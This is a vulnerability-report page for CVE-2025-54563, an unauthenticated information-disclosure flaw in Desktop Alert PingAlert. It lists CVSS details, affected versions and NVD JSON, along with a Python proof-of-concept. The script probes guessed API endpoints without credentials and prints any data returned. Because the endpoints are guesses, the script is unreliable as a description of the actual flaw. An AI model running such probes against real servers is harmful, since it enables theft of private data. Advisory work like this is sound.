Security Vulnerability Report
中文
CVE-2025-54563 CVSS 7.5 HIGH

CVE-2025-54563

Published: 2025-11-24 22:15:50
Last Modified: 2025-12-05 20:27:06

Description

An Incorrect Access Control vulnerability was found in the Application Server of Desktop Alert PingAlert version 6.1.0.11 to 6.1.1.2 which allows Incorrect Access Control, leading to Remote Information Disclosure.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:desktopalert:pingalert_application_server:*:*:*:*:*:*:*:* - VULNERABLE
Desktop Alert PingAlert >= 6.1.0.11
Desktop Alert PingAlert <= 6.1.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-54563 PoC - Desktop Alert PingAlert Unauthorized Information Disclosure # Affected Versions: 6.1.0.11 to 6.1.1.2 import requests import sys def check_vulnerability(target_url): """ Check if the target is vulnerable to CVE-2025-54563 This PoC attempts to access protected endpoints without authentication """ print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-54563 - Desktop Alert PingAlert Access Control Bypass") # Common endpoints that might be vulnerable endpoints = [ "/api/v1/alerts", "/api/v1/config", "/api/v1/users", "/api/v1/system", "/api/v1/sensitive-data", "/rest/v1/protected", "/admin/api/config", "/pingalert/api/data" ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Accept': 'application/json, text/html, */*' } vulnerable = False for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: response = requests.get(url, headers=headers, timeout=10, verify=False) # Check if we get unauthorized access to sensitive data if response.status_code == 200: content_type = response.headers.get('Content-Type', '') if 'application/json' in content_type or len(response.content) > 0: print(f"[+] VULNERABLE: {url}") print(f" Status: {response.status_code}") print(f" Content-Length: {len(response.content)}") print(f" Sample data: {response.text[:200]}...") vulnerable = True elif response.status_code == 401 or response.status_code == 403: print(f"[-] Protected: {url} (Status: {response.status_code})") except requests.exceptions.RequestException as e: print(f"[!] Error accessing {url}: {e}") if vulnerable: print("\n[!] Target appears to be VULNERABLE to CVE-2025-54563") print("[!] Immediate remediation is required") else: print("\n[*] No obvious vulnerabilities detected, but manual testing is recommended") return vulnerable if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-54563-poc.py <target_url>") print("Example: python cve-2025-54563-poc.py http://target.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54563", "sourceIdentifier": "[email protected]", "published": "2025-11-24T22:15:49.500", "lastModified": "2025-12-05T20:27:05.533", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Incorrect Access Control vulnerability was found in the Application Server of Desktop Alert PingAlert version 6.1.0.11 to 6.1.1.2 which allows Incorrect Access Control, leading to Remote Information Disclosure."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:desktopalert:pingalert_application_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1.0.11", "versionEndExcluding": "6.1.1.6", "matchCriteriaId": "3E233390-7D3C-4DAD-9947-030770EDAC05"}]}]}], "references": [{"url": "https://desktopalert.net/cve-2025-54563/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}